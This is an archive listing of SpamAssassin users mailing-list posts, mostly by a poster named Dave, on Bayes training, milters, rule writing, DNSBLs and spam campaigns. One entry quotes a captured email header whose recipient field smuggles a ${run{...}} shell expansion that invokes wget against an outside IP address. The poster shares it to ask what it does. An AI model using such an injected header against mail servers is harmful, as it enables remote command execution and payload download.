Re: Catch a rejected message ?

nse and then feeding the results of interpreting SA's evaluation of the message. That milter-reject status is the milter's responding to Postfix. So you need to look at the capabilities of your milter to customize it's response for the particular message(s) in question. Dave On Fri, 1 Dec 2

Re: Really hard-to-filter spam

use it. So if you -are- getting Bayes scores then that indicates that SA is using some database other than what you think it has. Now start manually training more messages (spam & ham). When you hit the 200 count threashold Bayes scores should start showing up in your logs. Good luck. -- Dave Fun

Re: authres missing when ran from spamass-milter

the spamassassin 'glue' milter. Milter results are chained so any headers explicitly added by one milter are passed on to succeeding milters. If those headers are being generated by the MTA then it may not be possible for milters to see them with out hacking the MTA itself. -- Dave Funk

Re: comparing sender domain against recipient domain

n attempts using European character sets with letters that look like O or e to fake common domain names. I've hand coded rules to check for this stuff when frequently abused but I don't know of a programmatic algorithm to do it automagically. Dave -- Dave Funk University

Re: Strange findings debugging bayes results

Hi, Here's also another 50+ headers we've collected over the years that I believe started as a list from AXB 10+ years ago. https://pastebin.com/raw/f6Fwh8HJ dave On 2/16/23 6:02 AM, Henrik K wrote: On Thu, Feb 16, 2023 at 10:18:50AM +0100, hg user wrote: I was investigating a bunch

Re: Gmail confidential mode

On 2022-10-16 10:38, Alex wrote: > What do you know about "Gmail confidential mode" emails? I'm starting to > see a few of these come in to users now, and not sure how to treat them. > They are sent through gmail, but require a one-time passcode sent to the >

metholdless URLs bypass DecodeShortURLs link shortner checking

les. Is this an issue with the DecodeShortURLs plugin or with SA? Where would I find the most recent version of DecodeShortURLs plugin? Thanks, Dave -- Dave Funk University of Iowa College of Engineering 319/335-5751 FAX: 319/384-05491256 Seamans Center, 103 S Capitol

Re: Matching on missing To field?

s none of Subject, From, To, Reply-To entries. IE a really malformed message. Dave -- Dave Funk University of Iowa College of Engineering 319/335-5751 FAX: 319/384-05491256 Seamans Center, 103 S Capitol St. Sys_admin/Postmaster/cell

Intuit servers sending paypal phishes

Hi, Intuit's servers are being used to send Paypal phishing invoices combined with the "evil numbers" scam. https://pastebin.com/iad07S8N Received: from o4.e.notification.intuit.com (o4.e.notification.intuit.com [167.89.82.160]) X-Spam-Status: No, score=-15.691 tagged_above=-200 required=5

Re: Why shouldn't I set the score for SPAM_99 and SPAM_999 higher?

That's a great call, thanks. I grepped my mail files and didn't find any SPAM_99 headers in any of them. You should be looking for BAYES_99 and BAYES_999 in your corpus. Thanks, Dave. I use my various mailboxes (sa-learn --ham --mbox /home/thomas.cameron/mail/INBOX/[mailbox file

Re: Why shouldn't I set the score for SPAM_99 and SPAM_999 higher?

my mail files and didn't find any SPAM_99 headers in any of them. You should be looking for BAYES_99 and BAYES_999 in your corpus. Best, Dave

Re: Add header, not beginning with X?

st for your own messages then some kind of custom delivery filter (EG procmail) would be the way to go. -- Dave Funk University of Iowa College of Engineering 319/335-5751 FAX: 319/384-05491256 Seamans Center, 103 S Capitol St. Sys_admin/Postmaster/cell

Re: Avoid processing upsteam trusted mail with X-Spam-Flag: YES?

On 2022-01-06 11:13, Benny Pedersen wrote: On 2022-01-06 18:20, Grant Taylor wrote: Q:  Does the upstream MSA not do filtering of inbound messages from clients?  I would think that this filtering would cover messages originating from the upstream organization to the downstream organization.

Re: SPF_NONE scoring

On 2021-11-30 12:24, Greg Troxel wrote: Lots of people think SPF is silly. And spammers spamming from a domain they control can even dkim/dmarc. Domain based reputation is an extremely powerful tool, but it is only useful when you know the actual sender of a message. The benefit isn't in

Re: Seeing "check: exceeded time limit in ..." and need to resolve it

to use the much more complex 'find' utility. Or the old-school rpm: $ rpm -ql spamassassin|grep TxRep /usr/share/man/man3/Mail::SpamAssassin::Plugin::TxRep.3pm.gz /usr/share/perl5/vendor_perl/Mail/SpamAssassin/Plugin/TxRep.pm Dave Martin

Re: page.link spam

secretadultnightclub.page.link but not just page.link Think of it like you would link shortner URLs (EG bit.ly). -- Dave Funk University of Iowa College of Engineering 319/335-5751 FAX: 319/384-05491256 Seamans Center, 103 S Capitol St. Sys_admin/Postmaster/cell_admin

SA 3.4.6 add From:addr host to URIHOSTS list?

In SA 3.4.1 the host value of From:addr was automagically added to the URIHOSTS list and thus exposed to URIBL lookups. SA 3.4.6 does not do that. Is there a configuration option to reactivate that feature? Thanks, Dave -- Dave Funk University of Iowa

Re: handle_user and connect to spamd failed

Add the option "-D 127.0.0.1" in that spamass-milter OPTIONS. -- Dave Funk University of Iowa College of Engineering 319/335-5751 FAX: 319/384-05491256 Seamans Center, 103 S Capitol St. Sys_admin/Postmaster/cell_admin Iowa City, IA 5

Re: handle_user and connect to spamd failed

-helper-home-dir' option needs an '=' with no spaces, or use the -H -- Dave Funk University of Iowa College of Engineering 319/335-5751 FAX: 319/384-05491256 Seamans Center, 103 S Capitol St. Sys_admin/Postmaster/cell_admin Iowa City, IA 52242-1527 #include B

Re: elf signature for clamav

score but meta with other things such as Bayes to jack up the score. -- Dave Funk University of Iowa College of Engineering 319/335-5751 FAX: 319/384-05491256 Seamans Center, 103 S Capitol St. Sys_admin/Postmaster/cell_admin Iowa City, IA 52242

Re: Message-ID with IPv6 domain-literal

.1.30]" is the representation of IPv4: 193.168.1.30 which is a Public IP address, thus that 'hit' is in error. This should be considered a parsing bug. -- Dave Funk University of Iowa College of Engineering 319/335-5751 FAX: 319/384-05491256 Seamans Center, 103 S

Re: An interesting bit of HTML from a spam

t picking up hosts in URLs? -- Dave Funk University of Iowa College of Engineering 319/335-5751 FAX: 319/384-05491256 Seamans Center, 103 S Capitol St. Sys_admin/Postmaster/cell_admin Iowa City, IA 52242-1527 #include Better is not better, 'standard' is better. B{

Re: spamass-milter (sa daemon loads config different to shell ?)

ass-milter specifically because of this issue. Writing a milter that directly talks the spamd protocol via a socket (local or network) is more work but safer and more efficient. (been there, done that, got the code to prove it). -- Dave Funk University of Iowa

Re: updates.spamassassin.org not resolving

On 2021-07-23 06:54, Benny Pedersen wrote: On 2021-07-23 14:35, Kevin A. McGrail wrote: TL;DR: Everything looks good to me. +1 I think you are just doing DNS calls that are either invalid or look like you are trying to do discovery through recursion.  For example: dig -t txt

Re: SA 3.4.5 meta with RBL rules not working.

rote: How about upgrading to latest 3.4.6? This release includes fixes for the following: - Fixed URIDNSBL not triggering meta rules On Mon, Jul 19, 2021 at 01:42:51AM -0500, Dave Funk wrote: I recently updated from SA 3.4.1 to 3.4.5 and noticed that a number of my "meta" rules quit wo

SA 3.4.5 meta with RBL rules not working.

massassin -D" does not give any clues what's going wrong. Any suggestions about how to debug this? Thanks, Dave -- Dave Funk University of Iowa College of Engineering 319/335-5751 FAX: 319/384-05491256 Seamans Center, 103 S Capitol St.

Re: Email Phishing and Zloader: Such a Disappointment

rules and heuristics/algorithms enabled. -- Dave Funk University of Iowa College of Engineering 319/335-5751 FAX: 319/384-05491256 Seamans Center, 103 S Capitol St. Sys_admin/Postmaster/cell_admin Iowa City, IA 52242-1527 #include Better is n

Re: spamass.sock - No such file or directory

Jun 26 09:26 spamass.sock > > or > > srw-rw  1   spamass-milter spamass-milter 0 Jun 26 09:26 spamass.sock > >/etc/group > spamass-milter:x:128:postfix > > thanks for any help -- Dave Funk

Re: Scan Attachment Content Using Spamassassin

se a whole different tool that comes with that kind of capability built-in (EG ClamAV). -- Dave Funk University of Iowa College of Engineering 319/335-5751 FAX: 319/384-05491256 Seamans Center, 103 S Capitol St. Sys_admin/Postmaster/cell_admin

Re: Scan Attachment Content Using Spamassassin

to take what ever kinds of actions you want based on what components 'fired'. -- Dave Funk University of Iowa College of Engineering 319/335-5751 FAX: 319/384-05491256 Seamans Center, 103 S Capitol St. Sys_admin/Postmaster/cell_admin Iowa City, IA

Counting number of instances of a particular header

characters but less than 150 I then tried: header L_MY_HEADER X-My-Header =~ /^.{5,200}/ Which would fire only once, even if there were 5 or more instances of the header. What am I doing wrong? How should I craft a rule to count the number of instances of that header? Thanks, Dave -- Dave Funk

Re: More fake order spam

e the brackets, so the rule matches/triggered. Regards, Dave

Re: More fake order spam

  _LOCAL_FAKE_ORDER_SUBJ + (__LOCAL_FAKE_ORDER_2 + __LOCAL_FAKE_ORDER_3 >= 1) score LOCAL_FAKE_ORDER 3.0 That's great, but probably doesn't have much longevity. You can also use the following for the presence of a header: header __LOCAL_FAKE_ORDER_2 exists:List-Id Regards, Dave

Re: More fake order spam

AS200484 Regards, Dave

Re: Spoofed amazon order email

ure you're using the KAM channel (as well as the regular sa-updates channel). https://mcgrail.com/template/kam.cf_channel Best, Dave

Re: ANN: ReturnPath rule renaming

r dealing with this. dave

Re: apache.org is blacklisted

-translator https://translate.google.com/translate?hl=en=auto=en=https%3A%2F%2Fspfbl.net%2Fen%2Fproject%2F Regards, Dave

Re: Error "cannot open bayes databases" lock failed: File exists

s -la /var/spamassassin/bayesdb/bayes* (taken from the bayes_path parameter) should get you what you want. even better: ls -la /var/spamassassin/bayesdb/ (to see if there's any leftover lock files in that directory) -- Dave Funk University of Iowa College of E

Re: Emotet today..

Pedro, do you see sigs for it yet? We're seeing a ton of Doc.Dropper.EmotetRed1220-9816007-0. Have you submitted a sample to Steve at Sanesecurity and clamav? Best, Dave On 1/13/21 10:39 AM, Pedro David Marco wrote: Hi all... sorry for the semi off-topic... Today Emotet is being sent

Re: BCC Rule and Subject change for specific rule

status/command that spamd returns to the milter for this kind of modification? If so the milters may need to be recoded to implement it. -- Dave Funk University of Iowa College of Engineering 319/335-5751 FAX: 319/384-05491256 Seamans Center, 103 S

Re: Bypass RBL checks for specific address

s. (needed for "postmaster" messages). What version of sendmail are you using? -- Dave Funk University of Iowa College of Engineering 319/335-5751 FAX: 319/384-05491256 Seamans Center, 103 S Capitol St. Sys_admin/Postmaster/cell_admin Iowa

Re: Bypass RBL checks for specific address

ems as if the tests are still run, and it's just the score is artificially offset based on which setting is used. I'm wanting to not run RBL tests for the specific recipient email address. -- Grant. . . . unix || die -- Dave Funk University of Iowa Coll

Re: Scoring Based on IP Address

ceived =~ /192\.168\.240\.\d{1,3}/ body __BAD_IP_BODY /192\.168\.240\.\d{1,3}/ rawbody __BAD_IP_RAWBODY /192\.168\.240\.\d{1,3}/ meta MY_BAD_SENDER __BAD_IP_RCVD || __BAD_IP_BODY || __BAD_IP_RAWBODY score MY_BAD_SENDER 20 describe MY_BAD_SENDER Contains bad IP Regards, Dave

Re: adding AV scanning to working Postfix/SA system

lamav.pm" # full L_CLAMAV eval:check_clamav() describe L_CLAMAV Clam AntiVirus detected a virus score L_CLAMAV 5 # header T__MY_CLAMAV X-Spam-Virus =~ /Yes/i header T__MY_CLAMAV_SANE X-Spam-Virus =~ /Yes.{1,50}Sanesecurity/i # -- Dave Funk Universit

Re: adding AV scanning to working Postfix/SA system

rules to add points for various kinds of things detected or "meta"ed with other rules. -- Dave Funk University of Iowa College of Engineering 319/335-5751 FAX: 319/384-05491256 Seamans Center, 103 S Capitol St. Sys_admin/Postmaster/cell_adm

Re: adding AV scanning to working Postfix/SA system

. I would also be interested in newer/supported AV alternatives. Regards, Dave Where did you hear this? I was just informed it will continue until 2023 at least. The "Free" version is no longer available, apparently, but the "endpoint" product is still there for paying

Re: adding AV scanning to working Postfix/SA system

pported AV alternatives. Regards, Dave On 11/23/20 5:37 PM, Joe Acquisto-j4 wrote: So, beyond "experiences" any leads on generic "how to" guides that actually work in practice?   I've found a few, rather than chase geese, I'm sure some here have done similar things, even if

Re: amazonses.com doubble dkim sign

signature is. There's nothing to prevent each system in the SMTP hand-off chain from adding their own signature, provided they do nothing to invalidate earlier signatures. More than two is unusual/overkill, but it's not uncommon to see two. -- Dave Funk University

Re: to: header is not in my domain

iling list, then otherwise adding points that would normally be overcome by a proper SPF record or Envelope From address, for example. You should submit a few of these emails to pastebin.com where we can analyze them more thoroughly for other patterns. Regards, Dave <mailto:anyaddr...@mydomain

Re: questions on spamassassin

m rule if they don't like how that particular rule works. See: https://cwiki.apache.org/confluence/display/SPAMASSASSIN/WhereDoLocalSettingsGo Once all the rules are read and parsed spamassassin has an internal order to how specific rules get run. -- Dave Funk Universit

Re: Thanks to Guardian Digital & LinuxSecurity for the nice post about SpamAssassin's upcoming change

. ;) This is the letter G brought to you by Oscar the grouch. -- Dave Funk University of Iowa College of Engineering 319/335-5751 FAX: 319/384-05491256 Seamans Center, 103 S Capitol St. Sys_admin/Postmaster/cell_admin Iowa City, IA 52242-1527 #include Better

Re: IMPORTANT NOTICE FOR PEOPLE RUNNING TRUNK re: [Bug 7826] Improve language around whitelist/blacklist and master/slave

because they are racially charged is silly. BLM is not going to give you a big hurrah on twitter for your efforts. I can't stop it from happening, so be it. DAve - On Jul 14, 2020, at 9:15 AM, Kevin A. McGrail wrote: > Dave, > The goal of removing racially-charged la

Re: IMPORTANT NOTICE FOR PEOPLE RUNNING TRUNK re: [Bug 7826] Improve language around whitelist/blacklist and master/slave

of both are not important, it is culturally insensitive to use the name Apache if you are not a native American. To not go all the way with this would simply be wrong. DAve - On Jul 14, 2020, at 8:28 AM, Kevin A. McGrail wrote: > I think you are reading other people's take on things. Clea

Re: IMPORTANT NOTICE FOR PEOPLE RUNNING TRUNK re: [Bug 7826] Improve language around whitelist/blacklist and master/slave

or be on the wrong side of history' (sic) tells me this is not about a more clear and understandable naming convention. This is posturing and pandering. I am disappointed greatly. Very disappointed. DAve - On Jul 14, 2020, at 5:03 AM, Kevin A. McGrail wrote: > Marc and others about vot

Re: IMPORTANT NOTICE FOR PEOPLE RUNNING TRUNK re: [Bug 7826] Improve language around whitelist/blacklist and master/slave

embarrassed by his failure to question the racist status quo of the world in which he had grown up. Regards, Dave -- Pedro

Re: score sender domains with 4+ chars in TLD?

/update the data file, no need to restart spamd) and could create a custom scoring value based on the DNS data (EG 127.0.0.2 for really 'good' TLDs, 127.0.0.4 for 'so-so' and 127.0.0.8 for truely spammy names). -- Dave Funk University of Iowa College of Engineeri

Coronavirus domains

relating to protecting users from coronavirus they'd like to share? dave

Re: Spamassassin reporting

That looks very familiar, and exactly what I am looking for. I can make that script work with our log files, thank you. DAve - On Dec 4, 2019, at 8:14 PM, Chris Pollock cpoll...@embarqmail.com wrote: > On Wed, 2019-12-04 at 11:22 -0500, Dave Goodrich wrote: >> Good morning, &g

Re: Spamassassin reporting

Thank you, we will look at that for possibly other things as well. DAve - On Dec 4, 2019, at 2:30 PM, Giovanni Bechis giova...@paclan.it wrote: > On 12/4/19 5:22 PM, Dave Goodrich wrote: >> Good morning, >> >> Many years ago, in previous jobs, I used several s

Spamassassin reporting

, but not useful. Can anyone recommend a ready to run OSS script, or set of scripts, for basic maillog stats concerning Spam? Just thought I would ask before I wrote something. Internet searching is not turning up anything for me. Thanks, DAve -- Dave Goodrich Information Technology City of Greenfield

Custom rule to please the Mayor

correct, it would have been stopped. Even if only for this one account, I need a rule to check that the Mayor's display name matches the Mayor's email account and I am at a loss how to manage that with SA rule structure. Any thoughts on that or has anyone done something similar? DAve -- Dave

Re: MALFORMED_FREEMAIL

In general it is the concept of sending from a particular domain in a format that the infrastructure on that domain will not send. A really easy to grasp concept: I know that example.com's mail server always adds a X-Yup-We-Sent-It: True header, so I will consider anything claiming to be

SpamAssassin 18th anniversary article

-celebrates-18-years-of-effectively-combating-spam-email We'd love to know what you think. Thanks, Dave

Shell commands in Received and Delivered-To headers

Hi all, Anyone have a guess on what this is trying to accomplish? From r...@sab.com Thu Jul 11 11:05:10 2019 Return-Path: X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22}}@host.example.com Delivered-To: usern...@example.com Received: by

Re: SpamAssassin Scoring For MDAEMON_DNSBL

On 2019-05-14 09:17, John Hardin wrote: On Tue, 14 May 2019, cyflhn wrote: It has happened many times that the emails from our server were identified as spam. I have checked the emails which were not identified as spam. But I found that the SpamAssassin Scoring For MDAEMON_DNSBL is quite

Re: Amazon continues to get tagged as spam

On 2019-04-02 06:01, RW wrote: On Mon, 01 Apr 2019 20:14:13 -0400 Dave Warren wrote: 1.8 DKIM_ADSP_DISCARD No valid author signature, domain signs all mail and suggests discarding the rest This is a bit odd too, I don't see ADSP records on Amazon's various .com domains (although

Re: Amazon continues to get tagged as spam

On Mon, Apr 1, 2019, at 17:11, @lbutlr wrote: > 3.5 BAYES_99 BODY: Bayes spam probability is 99 to 100% > [score: 1.] > 0.2 BAYES_999 BODY: Bayes spam probability is 99.9 to 100% > [score: 1.] These two are both a

Re: Filtering at border routers: Is it possible?

On 2019-03-22 21:43, Grant Taylor wrote: On 3/22/19 7:01 PM, Dave Warren wrote: To me, the big one is this: It sets your users up for failure. If a user configures their client on a network that allows unrestricted port 25 access and later moves (temporarily or permanently) to a network

Re: Filtering at border routers: Is it possible?

On 2019-03-22 18:37, Grant Taylor wrote: On 3/22/19 3:23 PM, Benny Pedersen wrote: you only need sasl auth You should do the SMTP Authentication across STARTTLS to protect credentials. do not enable sasl auth on port 25, if it lists AUTH on port 25 ehlo, you will need to remove  it in

Re: Filtering at border routers: Is it possible?

On 2019-03-22 18:39, Grant Taylor wrote: On 3/22/19 3:29 PM, Benny Pedersen wrote: custommers wish for port 25 open relay ? Having unfettered access to send traffic to TCP port 25 is /not/ the same thing as an open relay. Especially if you are a host with your clients running self-managed

Re: more spam is getting through :-(

On 2019-03-18 23:39, Duane Hill wrote: Hello Dave, Tuesday, March 19, 2019, 12:11:40 AM, you wrote: *> On 2019-03-18 17:40, @lbutlr wrote: On 18 Mar 2019, at 13:59, James <*bjloc...@lockie.ca <mailto:bjloc...@lockie.ca>*> wrote: On 2019-03-17 5:43 p.m., @lbutlr wrote:

Re: more spam is getting through :-(

On 2019-03-18 17:40, @lbutlr wrote: On 18 Mar 2019, at 13:59, James wrote: On 2019-03-17 5:43 p.m., @lbutlr wrote: On 17 Mar 2019, at 15:03, James wrote: I run sa-learn --ham on my inboxes. You inboxes likely contain spam messages that haven't been caught, so training on inbox will

Re: more spam is getting through :-(

On Sun, Mar 17, 2019, at 22:45, John Hardin wrote: > On Sun, 17 Mar 2019, James wrote: > > $ sudo sa-learn --dump magic > > 0.000 04665448 0 non-token data: nspam > > 0.000 0 51031938 0 non-token data: nham > > I'd generally expect those numbers to be

Re: Is it weird to worry I'm getting too little spam? (success of RBLs)

In my experience, the right combination of DNSBLs are extremely effective, typically well into the 90% of delivery attempts can be rejected before the DATA command (and therefore before SpamAssassin) with a combination of DNSBLs, RFC validations (greet pause of 11 seconds, early talkers rejected),

Re: mysql 8 database problem

Any help is appreciated, thank you! Have you run mysql_upgrade after upgrading? I'd also consider changing to mariadb if it's supported by your distribution. Regards, Dave Best regards, Csaba

Re: FPs on FORGED_MUA_MOZILLA (for my own hand-typed messages from my latest-version Thunderbird)

> On Oct 2, 2018, at 13:49, Bill Cole > wrote: > > On 2 Oct 2018, at 13:39, Matus UHLAR - fantomas wrote: > >>> On 2 Oct 2018, at 9:36, Rob McEwen wrote: SIDE NOTE: I don't think there was any domain my message that was blacklisted on URIBL - so I can't explain the "URIBL_BLOCKED",

Re: repeated sa-update problems

and only fetches from it. possibility of fetching from multiple mirrors would help here. Dave, is secnap one of the mirrors using a CDN? I will have to check later if someone else can't check today.  I am at a customer location where I don't have good VPN connection out and will be traveling

Re: stackexchange.com in URIBL (false positive?)

, and listed for a reason. The default score for URIBL_BLACK is 1.7 with bayes. Why have you changed it? You can request that it be delisted here: https://admin.uribl.com/ Regards, Dave

Re: Just to lighten your day?

18.(c)" Being the open source advocates that we are here, I actually thought it was a reference to the "copyleft" license. https://en.wikipedia.org/wiki/All_rights_reversed Not to be confused with the Chemical Brothers song by the same name, lol. Best, Dave

Re: sneaky spams w/zipped URL file, easily caught by "Thread-Index"

is just a few dozen(?) lines of rules to tag file types within zip/rar/7z/arj/exe files. Perhaps because you're outright rejecting many of these file types already? Regards, Dave 3,110,729 total messages* since March 15th 112,477 spam blocked 2,071 total viruses found 8 Foxhole viruses found

Re: IADB whitelist - again

On 2018-03-04 05:46, David Jones wrote: That's great.  It means you know what you are doing when you change the default threshold to less than 5.0.  In that case you need to change a lot of other scores down too including RCVD_IN_IADB_* and the KAM.cf rules probably score way too high for you

Re: From:name spoofing

On 2018-02-17 01:11, Daniele Duca wrote: On 17/02/2018 00:41, John Hardin wrote: Not necessarily safe. If your MTA receives a message without a Message-ID, it is supposed to generate one. And if it does so, it will probably do so using your (recipient) domain... Isn't MID creation

Re: Email filtering theory and the definition of spam

On Wed, Feb 7, 2018, at 15:52, Martin Gregorie wrote: > > Technically, you asked for the email and they have a valid opt-out > > process that will stop sending you email. Yes, the site has scummy > > practices but that is not spam by my definition. > > > Yes, under EU/UK that counts as spam

Re: Barracuda Reputation Block List (BRBL) removal from the SA ruleset

On 2018-02-05 09:12, Benny Pedersen wrote: Kevin A. McGrail skrev den 2018-02-05 16:53: I don't think that will apply will it because it will be looking up something like 1.2.3.4.bb.barracuda.blah which isn't cached. the first qurry can make a qurry with very low ttl, so it would not be

***UNCHECKED*** Can't locate object method "trim_domain"

Hi, while learning an mbox on a recent 3.4.2 svn: # sa-learn --spam --progress --mbox junk-012618 28% [== ] 5.53 msgs/sec 00m44s LEFTUse of uninitialized value in lc at

Re: Using Cloud AutoML as an AI for an Anti-spam filter ?

On Tue, Jan 23, 2018, at 02:55, Zulma Pape wrote: > In other words, can we integrate the Cloud AutoML into our server's > spam filter and make it behave the same way Gmail behave ? In short, not without a *lot* of work. Gmail implements a lot more complexity, and they have a lot more data than

Re: NOTE: Warning to Abusers of Update Servers

e http. We typically set new mirrors at the weight of 1 and then > you can let us know if we can bump it up.> Regards, > KAM > > On November 23, 2017 10:08:06 PM EST, Dave Warren > <d...@thedave.ca> wrote:>> On Thu, Nov 23, 2017, at 16:01, Kevin A. McGrail >

Re: NOTE: Warning to Abusers of Update Servers

On Fri, Nov 24, 2017, at 09:45, RW wrote: > On Fri, 24 Nov 2017 08:23:21 -0700 > Dave wrote: > > >> It mostly shouldn't, but when I was supporting a mail server that > > >> included a SpamAssassin integration, we ran into a non-zero number > > >>

Re: NOTE: Warning to Abusers of Update Servers

My recollection is that something was eating the TXT results; but not the A records. Probably a PIX or something like that, it broke ESMTP pretty badly too. > On Nov 24, 2017, at 06:34, RW <rwmailli...@googlemail.com> wrote: > > On Thu, 23 Nov 2017 16:39:25 -0700 >

Re: NOTE: Warning to Abusers of Update Servers

On Thu, Nov 23, 2017, at 16:01, Kevin A. McGrail wrote: > On 11/23/2017 6:31 PM, Dave Warren wrote: > > Would more mirrors be useful? I've got a ton of spare upstream > > bandwidth and am in the progress of setting up a few mirrors for other > > projects. > > >

Re: NOTE: Warning to Abusers of Update Servers

On 2017-11-21 11:57, RW wrote: On Tue, 21 Nov 2017 08:55:34 -0600 David Jones wrote: You are correct. I haven't dug into the code to verify but it appears that 3.4.x sa-update does use the DNS TXT record to know when to download so it doesn't hurt anything to run this version hourly. By

Re: NOTE: Warning to Abusers of Update Servers

Would more mirrors be useful? I've got a ton of spare upstream bandwidth and am in the progress of setting up a few mirrors for other projects. On 2017-11-21 10:47, Kevin A. McGrail wrote: My goal is to stop abuse without causing undue grief or fps. It may come to more draconian steps as you

Re: SA-Update not updating DB

nstall ${REV}.tar.gz +1 for sunday. I installed this now to my farm and will keep and eye on it thru weekend. +1 for Sunday here too. We've installed it all around and doing great so far. Thanks everyone for the amazing work. Thanks, Dave

Re: SA-Update not updating DB

environment variable first. Just copy the text including the REV=1815298 and paste on the command-line as root and it should work. Regards, Dave

Re: Blocking senders that are whitelisted

On 2017-10-04 10:26, Ian Zimmerman wrote: On 2017-10-04 10:52, David Jones wrote: I bet this user signed up for this email somehow, possibly a while ago and has forgotten about doing so. So many times, when you register for accounts on websites, the check box to opt-in to a mailing list is

Re: SA 3.4.1 for Centos 7?

On 07/26/2017 12:54 PM, David Jones wrote: On 07/26/2017 11:50 AM, John Hardin wrote: Can anyone recommend a 3.4.1 RPM for Centos 7 x86_64, or indicate when 3.4.1 will be part of the base for Centos 7 / RHEL? Currently it's 3.4.0 and that has some URI redirector issues. Thx. This worked

Re: Direct download link detection

On Mon, Jul 24, 2017, at 15:00, Alex wrote: > Hi, > > We're currently experiencing a new spam campaign that involves some > text pertaining to invoicing then a link that immediately downloads a > Word macro file. > > http://sdeflores.com/PHJC579907/ > > What would be involved in following these

Re: "bout u" campaign

On 07/13/2017 12:39 PM, Alex wrote: Hi, header RCVD_IN_SENDERSCORE_0_29 eval:check_rbl('senderscore0-lastexternal','score.senderscore.com.','^127\.0\.4\.([1-2]?[0-9])$') describeRCVD_IN_SENDERSCORE_0_29Senderscore.org score of 0 to 29 score

Re: "bout u" campaign

On 07/13/2017 12:03 PM, @lbutlr wrote: On Jul 12, 2017, at 8:18 PM, David Jones wrote: -2.2 RCVD_IN_SENDERSCORE_90_100 Senderscore.org score of 90 to 100 I haven’t seen that before (or not that I’ve noticed). Is it part fo the base SA package or something that was added?

Re: updates.spamassassin.org gone?

Did you read any of the thread? There shouldn't be an A record, and there literally can't be a (valid) PTR record. On Thu, Jul 6, 2017, at 15:48, jdow wrote: > No A or PTR record: > > ===8<--- > [jdow@thursday ~]$ dig updates.spamassassin.org ns1.apache.org all > > ; <<>> DiG

  1   2   3   4   5   6   7   8   9   >